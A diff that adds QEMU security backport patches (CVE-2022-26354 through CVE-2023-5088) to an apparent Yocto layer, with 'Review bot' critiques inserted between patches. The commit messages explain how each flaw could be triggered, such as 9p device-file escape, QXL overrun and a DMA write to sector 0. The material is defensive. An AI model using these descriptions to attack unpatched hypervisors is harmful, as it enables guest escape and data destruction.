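+From: Stefano Garzarella <sgarzare@redhat.com>
+Date: Mon, 28 Feb 2022 10:50:58 +0100
+Subject: [PATCH] vhost-vsock: detach the virqueue element in case of error
+
+In vhost_vsock_common_send_transport_reset(), if an element popped from
+the virtqueue is invalid, we should call virtqueue_detach_element() to
+detach it from the virtqueue before freeing its memory.
+
+Fixes: fc0b9b0e1c ("vhost-vsock: add virtio sockets device")
+Fixes: CVE-2022-26354
+Cc: qemu-stable@nongnu.org
+Reported-by: VictorV <vv474172261@gmail.com>
+Signed-off-by: Stefano Garzarella <sgarzare@redhat.com>
+Message-Id: <20220228095058.27899-1-sgarzare@redhat.com>
+Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+CVE: CVE-2022-26354
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2022-26354.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8d1b247f3748ac4078524130c6d7ae42b6140aaf ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/virtio/vhost-vsock-common.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+--- a/hw/virtio/vhost-vsock.c
++++ b/hw/virtio/vhost-vsock.c
+@@ -221,19 +221,23 @@ static void vhost_vsock_send_transport_r
+ if (elem->out_num) {
+ error_report("invalid vhost-vsock event virtqueue element with "
+ "out buffers");
+- goto out;
++ goto err;
+ }
+
+ if (iov_from_buf(elem->in_sg, elem->in_num, 0,
+ &event, sizeof(event)) != sizeof(event)) {
+ error_report("vhost-vsock event virtqueue element is too short");
+- goto out;
++ goto err;
+ }
+
+ virtqueue_push(vq, elem, sizeof(event));
+ virtio_notify(VIRTIO_DEVICE(vsock), vq);
+
+-out:
++ g_free(elem);
++ return;
++
++err:
++ virtqueue_detach_element(vq, elem, 0);
+ g_free(elem);
+ }
+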
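--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
@@ -0,0 +1,53 @@
+From 09a07b5b39c87423df9e8f6574c19a14d36beac5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 27 Jul 2022 10:34:12 +0530
+Subject: [PATCH] CVE-2022-35414
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/418ade7849ce7641c0f7333718caf5091a02fd4c]
+CVE: CVE-2022-35414
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ exec.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/exec.c b/exec.c
+index 43c70ffb..2d6add46 100644
+--- a/exec.c
++++ b/exec.c
+@@ -685,7 +685,7 @@ static void tcg_iommu_free_notifier_list(CPUState *cpu)
+
+ /* Called from RCU critical section */
+ MemoryRegionSection *
+-address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
++address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr orig_addr,
+ hwaddr *xlat, hwaddr *plen,
+ MemTxAttrs attrs, int *prot)
+ {
+@@ -694,6 +694,7 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
+ IOMMUMemoryRegionClass *imrc;
+ IOMMUTLBEntry iotlb;
+ int iommu_idx;
++ hwaddr addr = orig_addr;
+ AddressSpaceDispatch *d = atomic_rcu_read(&cpu->cpu_ases[asidx].memory_dispatch);
+
+ for (;;) {
+@@ -737,6 +738,16 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
+ return section;
+
+ translate_fail:
++ /*
++ * We should be given a page-aligned address -- certainly
++ * tlb_set_page_with_attrs() does so. The page offset of xlat
++ * is used to index sections[], and PHYS_SECTION_UNASSIGNED = 0.
++ * The page portion of xlat will be logged by memory_region_access_valid()
++ * when this memory access is rejected, so use the original untranslated
++ * physical address.
++ */
++ assert((orig_addr & ~TARGET_PAGE_MASK) == 0);
++ *xlat = orig_addr;
+ return &d->map.sections[PHYS_SECTION_UNASSIGNED];
+ }
+ #endif
+--
+2.25.1
+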
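--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
@@ -0,0 +1,103 @@
+From 6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
+Date: Mon, 28 Nov 2022 21:27:40 +0100
+Subject: [PATCH] hw/display/qxl: Avoid buffer overrun in qxl_phys2virt
+ (CVE-2022-4144)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Have qxl_get_check_slot_offset() return false if the requested
+buffer size does not fit within the slot memory region.
+
+Similarly qxl_phys2virt() now returns NULL in such case, and
+qxl_dirty_one_surface() aborts.
+
+This avoids buffer overrun in the host pointer returned by
+memory_region_get_ram_ptr().
+
+Fixes: CVE-2022-4144 (out-of-bounds read)
+Reported-by: Wenxu Yin (@awxylitol)
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1336
+
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
+Message-Id: <20221128202741.4945-5-philmd@linaro.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622]
+CVE: CVE-2022-4144
+Comments: Deleted patch hunk in qxl.h,as it contains change
+in comments which is not present in current version of qemu.
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ hw/display/qxl.c | 27 +++++++++++++++++++++++----
+ 1 file changed, 23 insertions(+), 4 deletions(-)
+
+diff --git a/hw/display/qxl.c b/hw/display/qxl.c
+index cd7eb39d..6bc8385b 100644
+--- a/hw/display/qxl.c
++++ b/hw/display/qxl.c
+@@ -1440,11 +1440,13 @@ static void qxl_reset_surfaces(PCIQXLDevice *d)
+
+ /* can be also called from spice server thread context */
+ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+- uint32_t *s, uint64_t *o)
++ uint32_t *s, uint64_t *o,
++ size_t size_requested)
+ {
+ uint64_t phys = le64_to_cpu(pqxl);
+ uint32_t slot = (phys >> (64 - 8)) & 0xff;
+ uint64_t offset = phys & 0xffffffffffff;
++ uint64_t size_available;
+
+ if (slot >= NUM_MEMSLOTS) {
+ qxl_set_guest_bug(qxl, "slot too large %d >= %d", slot,
+@@ -1468,6 +1470,23 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ slot, offset, qxl->guest_slots[slot].size);
+ return false;
+ }
++ size_available = memory_region_size(qxl->guest_slots[slot].mr);
++ if (qxl->guest_slots[slot].offset + offset >= size_available) {
++ qxl_set_guest_bug(qxl,
++ "slot %d offset %"PRIu64" > region size %"PRIu64"\n",
++ slot, qxl->guest_slots[slot].offset + offset,
++ size_available);
++ return false;
++ }
++ size_available -= qxl->guest_slots[slot].offset + offset;
++ if (size_requested > size_available) {
++ qxl_set_guest_bug(qxl,
++ "slot %d offset %"PRIu64" size %zu: "
++ "overrun by %"PRIu64" bytes\n",
++ slot, offset, size_requested,
++ size_requested - size_available);
++ return false;
++ }
+
+ *s = slot;
+ *o = offset;
+@@ -1486,7 +1505,7 @@ void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
+ offset = le64_to_cpu(pqxl) & 0xffffffffffff;
+ return (void *)(intptr_t)offset;
+ case MEMSLOT_GROUP_GUEST:
+- if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset)) {
++ if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
+ return NULL;
+ }
+ ptr = memory_region_get_ram_ptr(qxl->guest_slots[slot].mr);
+@@ -1944,9 +1963,9 @@ static void qxl_dirty_one_surface(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ uint32_t slot;
+ bool rc;
+
+- rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset);
+- assert(rc == true);
+ size = (uint64_t)height * abs(stride);
++ rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size);
++ assert(rc == true);
+ trace_qxl_surfaces_dirty(qxl->id, offset, size);
+ qxl_set_dirty(qxl->guest_slots[slot].mr,
+ qxl->guest_slots[slot].offset + offset,
+--
+2.25.1
+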
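Review bot: The qxl_phys2virt hunk passes `size` to qxl_get_check_slot_offset, but its hunk header still shows the signature `qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)` and no visible hunk declares `size` in that function. Unless a companion patch that adds a size parameter to qxl_phys2virt and its callers is applied first, hw/display/qxl.c will not compile when the QXL device is built. The description says the qxl.h hunk was dropped, so check that the prototype and every call site are covered elsewhere in the series. In qxl_dirty_one_surface the result of the new size check feeds `assert(rc == true);`, so an oversized surface there aborts the process rather than being reported through qxl_set_guest_bug alone.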
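--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
@@ -0,0 +1,77 @@
+[Ubuntu note: remove fuzz-lsi53c895a-test.c changes since the file does not
+ exist for this release]
+From b987718bbb1d0eabf95499b976212dd5f0120d75 Mon Sep 17 00:00:00 2001
+From: Thomas Huth <thuth@redhat.com>
+Date: Mon, 22 May 2023 11:10:11 +0200
+Subject: [PATCH] hw/scsi/lsi53c895a: Fix reentrancy issues in the LSI
+ controller (CVE-2023-0330)
+
+We cannot use the generic reentrancy guard in the LSI code, so
+we have to manually prevent endless reentrancy here. The problematic
+lsi_execute_script() function has already a way to detect whether
+too many instructions have been executed - we just have to slightly
+change the logic here that it also takes into account if the function
+has been called too often in a reentrant way.
+
+The code in fuzz-lsi53c895a-test.c has been taken from an earlier
+patch by Mauro Matteo Cascella.
+
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1563
+Message-Id: <20230522091011.1082574-1-thuth@redhat.com>
+Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
+Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Thomas Huth <thuth@redhat.com>
+
+Reference: https://launchpad.net/ubuntu/+source/qemu/1:4.2-3ubuntu6.27
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2023-0330.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/qemu-project/qemu/-/commit/b987718bbb1d0eabf95499b976212dd5f0120d75]
+CVE: CVE-2023-0330
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/scsi/lsi53c895a.c | 23 +++++++++++++++------
+ tests/qtest/fuzz-lsi53c895a-test.c | 33 ++++++++++++++++++++++++++++++
+ 2 files changed, 50 insertions(+), 6 deletions(-)
+
+--- qemu-4.2.orig/hw/scsi/lsi53c895a.c
++++ qemu-4.2/hw/scsi/lsi53c895a.c
+@@ -1135,15 +1135,24 @@ static void lsi_execute_script(LSIState
+ uint32_t addr, addr_high;
+ int opcode;
+ int insn_processed = 0;
++ static int reentrancy_level;
++
++ reentrancy_level++;
+
+ s->istat1 |= LSI_ISTAT1_SRUN;
+ again:
+- if (++insn_processed > LSI_MAX_INSN) {
+- /* Some windows drivers make the device spin waiting for a memory
+- location to change. If we have been executed a lot of code then
+- assume this is the case and force an unexpected device disconnect.
+- This is apparently sufficient to beat the drivers into submission.
+- */
++ /*
++ * Some windows drivers make the device spin waiting for a memory location
++ * to change. If we have executed more than LSI_MAX_INSN instructions then
++ * assume this is the case and force an unexpected device disconnect. This
++ * is apparently sufficient to beat the drivers into submission.
++ *
++ * Another issue (CVE-2023-0330) can occur if the script is programmed to
++ * trigger itself again and again. Avoid this problem by stopping after
++ * being called multiple times in a reentrant way (8 is an arbitrary value
++ * which should be enough for all valid use cases).
++ */
++ if (++insn_processed > LSI_MAX_INSN || reentrancy_level > 8) {
+ if (!(s->sien0 & LSI_SIST0_UDC)) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "lsi_scsi: inf. loop with UDC masked");
+@@ -1597,6 +1606,8 @@ again:
+ }
+ }
+ trace_lsi_execute_script_stop();
++
++ reentrancy_level--;
+ }
+
+ static uint8_t lsi_reg_readb(LSIState *s, int offset)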
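Review bot: The added `reentrancy_level--` sits only at the normal end of lsi_execute_script(), so any path that leaves the function earlier keeps the counter raised. The limit branch at `if (++insn_processed > LSI_MAX_INSN || reentrancy_level > 8)` continues past the end of the first hunk; if it returns after forcing the disconnect, the count is never given back, and because the variable is function-static it does not recover, so later scripts would be cut off on entry. I would add `reentrancy_level--;` before every early `return` in that branch and give the limit a name such as `#define LSI_MAX_REENTRANCY 8`. The counter is also shared by every LSI controller in the VM rather than kept per LSIState, which deserves a comment next to the declaration.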
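--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
@@ -0,0 +1,178 @@
+From f6b0de53fb87ddefed348a39284c8e2f28dc4eda Mon Sep 17 00:00:00 2001
+From: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Date: Wed, 7 Jun 2023 18:29:33 +0200
+Subject: [PATCH] 9pfs: prevent opening special files (CVE-2023-2861)
+
+The 9p protocol does not specifically define how server shall behave when
+client tries to open a special file, however from security POV it does
+make sense for 9p server to prohibit opening any special file on host side
+in general. A sane Linux 9p client for instance would never attempt to
+open a special file on host side, it would always handle those exclusively
+on its guest side. A malicious client however could potentially escape
+from the exported 9p tree by creating and opening a device file on host
+side.
+
+With QEMU this could only be exploited in the following unsafe setups:
+
+ - Running QEMU binary as root AND 9p 'local' fs driver AND 'passthrough'
+ security model.
+
+or
+
+ - Using 9p 'proxy' fs driver (which is running its helper daemon as
+ root).
+
+These setups were already discouraged for safety reasons before,
+however for obvious reasons we are now tightening behaviour on this.
+
+Fixes: CVE-2023-2861
+Reported-by: Yanwu Shen <ywsPlz@gmail.com>
+Reported-by: Jietao Xiao <shawtao1125@gmail.com>
+Reported-by: Jinku Li <jkli@xidian.edu.cn>
+Reported-by: Wenbo Shen <shenwenbo@zju.edu.cn>
+Signed-off-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Reviewed-by: Greg Kurz <groug@kaod.org>
+Reviewed-by: Michael Tokarev <mjt@tls.msk.ru>
+Message-Id: <E1q6w7r-0000Q0-NM@lizzy.crudebyte.com>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/f6b0de53fb87ddefed348a39284c8e2f28dc4eda]
+CVE: CVE-2023-2861
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ fsdev/virtfs-proxy-helper.c | 27 +++++++++++++++++++++++--
+ hw/9pfs/9p-util.h | 40 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 65 insertions(+), 2 deletions(-)
+
+diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
+index 6f132c5f..300c9765 100644
+--- a/fsdev/virtfs-proxy-helper.c
++++ b/fsdev/virtfs-proxy-helper.c
+@@ -26,6 +26,7 @@
+ #include "qemu/xattr.h"
+ #include "9p-iov-marshal.h"
+ #include "hw/9pfs/9p-proxy.h"
++#include "hw/9pfs/9p-util.h"
+ #include "fsdev/9p-iov-marshal.h"
+
+ #define PROGNAME "virtfs-proxy-helper"
+@@ -350,6 +351,28 @@ static void resetugid(int suid, int sgid)
+ }
+ }
+
++/*
++ * Open regular file or directory. Attempts to open any special file are
++ * rejected.
++ *
++ * returns file descriptor or -1 on error
++ */
++static int open_regular(const char *pathname, int flags, mode_t mode)
++{
++ int fd;
++
++ fd = open(pathname, flags, mode);
++ if (fd < 0) {
++ return fd;
++ }
++
++ if (close_if_special_file(fd) < 0) {
++ return -1;
++ }
++
++ return fd;
++}
++
+ /*
+ * send response in two parts
+ * 1) ProxyHeader
+@@ -694,7 +717,7 @@ static int do_create(struct iovec *iovec)
+ if (ret < 0) {
+ goto unmarshal_err_out;
+ }
+- ret = open(path.data, flags, mode);
++ ret = open_regular(path.data, flags, mode);
+ if (ret < 0) {
+ ret = -errno;
+ }
+@@ -719,7 +742,7 @@ static int do_open(struct iovec *iovec)
+ if (ret < 0) {
+ goto err_out;
+ }
+- ret = open(path.data, flags);
++ ret = open_regular(path.data, flags, 0);
+ if (ret < 0) {
+ ret = -errno;
+ }
+diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
+index 546f46dc..79fdd2a3 100644
+--- a/hw/9pfs/9p-util.h
++++ b/hw/9pfs/9p-util.h
+@@ -13,12 +13,16 @@
+ #ifndef QEMU_9P_UTIL_H
+ #define QEMU_9P_UTIL_H
+
++#include "qemu/error-report.h"
++
+ #ifdef O_PATH
+ #define O_PATH_9P_UTIL O_PATH
+ #else
+ #define O_PATH_9P_UTIL 0
+ #endif
+
++#define qemu_fstat fstat
++
+ static inline void close_preserve_errno(int fd)
+ {
+ int serrno = errno;
+@@ -26,6 +30,38 @@ static inline void close_preserve_errno(int fd)
+ errno = serrno;
+ }
+
++/**
++ * close_if_special_file() - Close @fd if neither regular file nor directory.
++ *
++ * @fd: file descriptor of open file
++ * Return: 0 on regular file or directory, -1 otherwise
++ *
++ * CVE-2023-2861: Prohibit opening any special file directly on host
++ * (especially device files), as a compromised client could potentially gain
++ * access outside exported tree under certain, unsafe setups. We expect
++ * client to handle I/O on special files exclusively on guest side.
++ */
++static inline int close_if_special_file(int fd)
++{
++ struct stat stbuf;
++
++ if (qemu_fstat(fd, &stbuf) < 0) {
++ close_preserve_errno(fd);
++ return -1;
++ }
++ if (!S_ISREG(stbuf.st_mode) && !S_ISDIR(stbuf.st_mode)) {
++ error_report_once(
++ "9p: broken or compromised client detected; attempt to open "
++ "special file (i.e. neither regular file, nor directory)"
++ );
++ close(fd);
++ errno = ENXIO;
++ return -1;
++ }
++
++ return 0;
++}
++
+ static inline int openat_dir(int dirfd, const char *name)
+ {
+ return openat(dirfd, name,
+@@ -56,6 +92,10 @@ again:
+ return -1;
+ }
+
++ if (close_if_special_file(fd) < 0) {
++ return -1;
++ }
++
+ serrno = errno;
+ /* O_NONBLOCK was only needed to open the file. Let's drop it. We don't
+ * do that with O_PATH since fcntl(F_SETFL) isn't supported, and openat()
+--
+2.25.1
+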
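Review bot: open_regular() in virtfs-proxy-helper.c calls `open(pathname, flags, mode)` before the file type is known, so a special file is still opened once and only afterwards closed by close_if_special_file(). On a FIFO that open can block the helper until a peer appears, and some device nodes act on open itself; the openat_file() hunk in 9p-util.h is covered for the blocking case by the O_NONBLOCK its trailing comment mentions, whereas this helper passes its `flags` argument through unchanged. I would open with `flags | O_NONBLOCK`, run close_if_special_file(), and then clear O_NONBLOCK again with fcntl() unless the caller asked for it. do_create() and do_open() start and end outside their hunks, so whether `flags` is filtered earlier is not visible here.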
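--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
@@ -0,0 +1,49 @@
+From 9d38a8434721a6479fe03fb5afb150ca793d3980 Mon Sep 17 00:00:00 2001
+From: zhenwei pi <pizhenwei@bytedance.com>
+Date: Thu, 3 Aug 2023 10:43:13 +0800
+Subject: [PATCH] virtio-crypto: verify src&dst buffer length for sym request
+
+For symmetric algorithms, the length of ciphertext must be as same
+as the plaintext.
+The missing verification of the src_len and the dst_len in
+virtio_crypto_sym_op_helper() may lead buffer overflow/divulged.
+
+This patch is originally written by Yiming Tao for QEMU-SECURITY,
+resend it(a few changes of error message) in qemu-devel.
+
+Fixes: CVE-2023-3180
+Fixes: 04b9b37edda("virtio-crypto: add data queue processing handler")
+Cc: Gonglei <arei.gonglei@huawei.com>
+Cc: Mauro Matteo Cascella <mcascell@redhat.com>
+Cc: Yiming Tao <taoym@zju.edu.cn>
+Signed-off-by: zhenwei pi <pizhenwei@bytedance.com>
+Message-Id: <20230803024314.29962-2-pizhenwei@bytedance.com>
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+Upstream-Status: Backport from [https://gitlab.com/qemu-project/qemu/-/commit/9d38a8434721a6479fe03fb5afb150ca793d3980]
+CVE: CVE-2023-3180
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ hw/virtio/virtio-crypto.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/virtio/virtio-crypto.c b/hw/virtio/virtio-crypto.c
+index 44faf5a522b..13aec771e11 100644
+--- a/hw/virtio/virtio-crypto.c
++++ b/hw/virtio/virtio-crypto.c
+@@ -634,6 +634,11 @@ virtio_crypto_sym_op_helper(VirtIODevice *vdev,
+ return NULL;
+ }
+
++ if (unlikely(src_len != dst_len)) {
++ virtio_error(vdev, "sym request src len is different from dst len");
++ return NULL;
++ }
++
+ max_len = (uint64_t)iv_len + aad_len + src_len + dst_len + hash_result_len;
+ if (unlikely(max_len > vcrypto->conf.max_size)) {
+ virtio_error(vdev, "virtio-crypto too big length");
+--
+GitLab
+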
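Review bot: The new `src_len != dst_len` rejection reports a fixed string, so someone reading the log cannot tell which lengths the guest supplied. Including both values, for example `virtio_error(vdev, "sym request src len %u differs from dst len %u", src_len, dst_len);` (with the format adjusted to the variables' declared types, which are outside the hunk), makes the guest error diagnosable. A one-line comment above the check such as `/* cipher output is the same size as its input; a mismatch would let later copies overrun the smaller buffer */` would record why equality is required, going by the patch description. virtio_crypto_sym_op_helper() starts and ends outside the hunk.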
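--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
@@ -0,0 +1,87 @@
+From 10be627d2b5ec2d6b3dce045144aa739eef678b4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Daniel=20P=2E=20Berrang=C3=A9?= <berrange@redhat.com>
+Date: Tue, 20 Jun 2023 09:45:34 +0100
+Subject: [PATCH] io: remove io watch if TLS channel is closed during handshake
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The TLS handshake make take some time to complete, during which time an
+I/O watch might be registered with the main loop. If the owner of the
+I/O channel invokes qio_channel_close() while the handshake is waiting
+to continue the I/O watch must be removed. Failing to remove it will
+later trigger the completion callback which the owner is not expecting
+to receive. In the case of the VNC server, this results in a SEGV as
+vnc_disconnect_start() tries to shutdown a client connection that is
+already gone / NULL.
+
+CVE-2023-3354
+Reported-by: jiangyegen <jiangyegen@huawei.com>
+Signed-off-by: Daniel P. Berrangé <berrange@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/10be627d2b5ec2d6b3dce045144aa739eef678b4]
+CVE: CVE-2023-3354
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ include/io/channel-tls.h | 1 +
+ io/channel-tls.c | 18 ++++++++++++------
+ 2 files changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/include/io/channel-tls.h b/include/io/channel-tls.h
+index fdbdf12f..e49e2831 100644
+--- a/include/io/channel-tls.h
++++ b/include/io/channel-tls.h
+@@ -49,6 +49,7 @@ struct QIOChannelTLS {
+ QIOChannel *master;
+ QCryptoTLSSession *session;
+ QIOChannelShutdown shutdown;
++ guint hs_ioc_tag;
+ };
+
+ /**
+diff --git a/io/channel-tls.c b/io/channel-tls.c
+index 7ec8ceff..8b32fbde 100644
+--- a/io/channel-tls.c
++++ b/io/channel-tls.c
+@@ -194,12 +194,13 @@ static void qio_channel_tls_handshake_task(QIOChannelTLS *ioc,
+ }
+
+ trace_qio_channel_tls_handshake_pending(ioc, status);
+- qio_channel_add_watch_full(ioc->master,
+- condition,
+- qio_channel_tls_handshake_io,
+- data,
+- NULL,
+- context);
++ ioc->hs_ioc_tag =
++ qio_channel_add_watch_full(ioc->master,
++ condition,
++ qio_channel_tls_handshake_io,
++ data,
++ NULL,
++ context);
+ }
+ }
+
+@@ -214,6 +215,7 @@ static gboolean qio_channel_tls_handshake_io(QIOChannel *ioc,
+ QIOChannelTLS *tioc = QIO_CHANNEL_TLS(
+ qio_task_get_source(task));
+
++ tioc->hs_ioc_tag = 0;
+ g_free(data);
+ qio_channel_tls_handshake_task(tioc, task, context);
+
+@@ -371,6 +373,10 @@ static int qio_channel_tls_close(QIOChannel *ioc,
+ {
+ QIOChannelTLS *tioc = QIO_CHANNEL_TLS(ioc);
+
++ if (tioc->hs_ioc_tag) {
++ g_clear_handle_id(&tioc->hs_ioc_tag, g_source_remove);
++ }
++
+ return qio_channel_close(tioc->master, errp);
+ }
+
+--
+2.25.1
+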
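Review bot: qio_channel_tls_close() removes the handshake watch with `g_source_remove`, which looks the id up in the default GLib main context only, while qio_channel_tls_handshake_task() attaches the watch to the caller-supplied `context`. When a handshake runs on a non-default context the removal would fail and the watch could still fire after close, which is the case this patch is meant to prevent. Keeping the context (or the GSource) next to `hs_ioc_tag` and destroying the source through `g_main_context_find_source_by_id()` plus `g_source_destroy()` would cover both cases. The watch is also registered with a NULL destroy notifier and `data` is freed only in qio_channel_tls_handshake_io(), so a watch removed on close appears to leak `data` and the pending task. All three functions extend beyond their hunks.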
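--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
@@ -0,0 +1,114 @@
+From 7d7512019fc40c577e2bdd61f114f31a9eb84a8e Mon Sep 17 00:00:00 2001
+From: Fiona Ebner <f.ebner@proxmox.com>
+Date: Wed, 6 Sep 2023 15:09:21 +0200
+Subject: [PATCH] hw/ide: reset: cancel async DMA operation before resetting
+ state
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If there is a pending DMA operation during ide_bus_reset(), the fact
+that the IDEState is already reset before the operation is canceled
+can be problematic. In particular, ide_dma_cb() might be called and
+then use the reset IDEState which contains the signature after the
+reset. When used to construct the IO operation this leads to
+ide_get_sector() returning 0 and nsector being 1. This is particularly
+bad, because a write command will thus destroy the first sector which
+often contains a partition table or similar.
+
+Traces showing the unsolicited write happening with IDEState
+0x5595af6949d0 being used after reset:
+
+> ahci_port_write ahci(0x5595af6923f0)[0]: port write [reg:PxSCTL] @ 0x2c: 0x00000300
+> ahci_reset_port ahci(0x5595af6923f0)[0]: reset port
+> ide_reset IDEstate 0x5595af6949d0
+> ide_reset IDEstate 0x5595af694da8
+> ide_bus_reset_aio aio_cancel
+> dma_aio_cancel dbs=0x7f64600089a0
+> dma_blk_cb dbs=0x7f64600089a0 ret=0
+> dma_complete dbs=0x7f64600089a0 ret=0 cb=0x5595acd40b30
+> ahci_populate_sglist ahci(0x5595af6923f0)[0]
+> ahci_dma_prepare_buf ahci(0x5595af6923f0)[0]: prepare buf limit=512 prepared=512
+> ide_dma_cb IDEState 0x5595af6949d0; sector_num=0 n=1 cmd=DMA WRITE
+> dma_blk_io dbs=0x7f6420802010 bs=0x5595ae2c6c30 offset=0 to_dev=1
+> dma_blk_cb dbs=0x7f6420802010 ret=0
+
+> (gdb) p *qiov
+> $11 = {iov = 0x7f647c76d840, niov = 1, {{nalloc = 1, local_iov = {iov_base = 0x0,
+> iov_len = 512}}, {__pad = "\001\000\000\000\000\000\000\000\000\000\000",
+> size = 512}}}
+> (gdb) bt
+> #0 blk_aio_pwritev (blk=0x5595ae2c6c30, offset=0, qiov=0x7f6420802070, flags=0,
+> cb=0x5595ace6f0b0 <dma_blk_cb>, opaque=0x7f6420802010)
+> at ../block/block-backend.c:1682
+> #1 0x00005595ace6f185 in dma_blk_cb (opaque=0x7f6420802010, ret=<optimized out>)
+> at ../softmmu/dma-helpers.c:179
+> #2 0x00005595ace6f778 in dma_blk_io (ctx=0x5595ae0609f0,
+> sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
+> io_func=io_func@entry=0x5595ace6ee30 <dma_blk_write_io_func>,
+> io_func_opaque=io_func_opaque@entry=0x5595ae2c6c30,
+> cb=0x5595acd40b30 <ide_dma_cb>, opaque=0x5595af6949d0,
+> dir=DMA_DIRECTION_TO_DEVICE) at ../softmmu/dma-helpers.c:244
+> #3 0x00005595ace6f90a in dma_blk_write (blk=0x5595ae2c6c30,
+> sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
+> cb=cb@entry=0x5595acd40b30 <ide_dma_cb>, opaque=opaque@entry=0x5595af6949d0)
+> at ../softmmu/dma-helpers.c:280
+> #4 0x00005595acd40e18 in ide_dma_cb (opaque=0x5595af6949d0, ret=<optimized out>)
+> at ../hw/ide/core.c:953
+> #5 0x00005595ace6f319 in dma_complete (ret=0, dbs=0x7f64600089a0)
+> at ../softmmu/dma-helpers.c:107
+> #6 dma_blk_cb (opaque=0x7f64600089a0, ret=0) at ../softmmu/dma-helpers.c:127
+> #7 0x00005595ad12227d in blk_aio_complete (acb=0x7f6460005b10)
+> at ../block/block-backend.c:1527
+> #8 blk_aio_complete (acb=0x7f6460005b10) at ../block/block-backend.c:1524
+> #9 blk_aio_write_entry (opaque=0x7f6460005b10) at ../block/block-backend.c:1594
+> #10 0x00005595ad258cfb in coroutine_trampoline (i0=<optimized out>,
+> i1=<optimized out>) at ../util/coroutine-ucontext.c:177
+
+Signed-off-by: Fiona Ebner <f.ebner@proxmox.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Tested-by: simon.rowe@nutanix.com
+Message-ID: <20230906130922.142845-1-f.ebner@proxmox.com>
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/7d7512019fc40c577e2bdd61f114f31a9eb84a8e]
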